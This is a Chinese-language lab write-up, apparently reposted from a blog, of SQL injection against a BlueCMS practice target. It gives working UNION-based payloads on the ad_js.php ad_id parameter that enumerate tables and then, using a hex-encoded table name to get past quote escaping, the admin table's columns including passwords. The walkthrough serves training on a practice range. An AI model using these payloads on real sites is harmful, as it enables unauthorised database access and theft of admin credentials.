码迷,mamicode.com
首页 > 其他好文 > 详细

封神台靶场:萌新也能找CMS突破

时间:2020-11-23 12:10:21      阅读:4      评论:0      收藏:0      [点我收藏+]

标签:http   sql   write   百度   信息   comm   where   tab   查询   

靶场地址

http://59.63.200.79:8003/bluecms/uploads/

技术图片

 

 百度查询了bluecms的相关漏洞

发现存在sql注入,且sql注入点在如下网页

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1

经过探测,发现字段数是7个

http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,database()

技术图片

 

 发现是可以爆出数据库相关信息的

爆表名

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+


document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");

根据上面爆出来的数据,我发现有两个敏感的表名,blue_admin,blue_admin_log

爆字段

但是我这里遇到了问题

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘blue_admin‘)--+

技术图片

初步判断是因为转义的原因,看到 \ 反斜杠,突然感觉有点像宽字节注入。

技术图片

但错误并没有解决,我去掉单引号后,识别出来的是这样的

table_name=遙lue_admin?

这导致sql语句不正常。

我想到用编码的方式试一下。

?ad_id=1%20union select 1,2,3,4,5,6,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f61646d696e)--+


document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");

页面无报错,爆出字段

封神台靶场:萌新也能找CMS突破

标签:http   sql   write   百度   信息   comm   where   tab   查询   

原文地址:https://www.cnblogs.com/Xshun-z/p/14001289.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!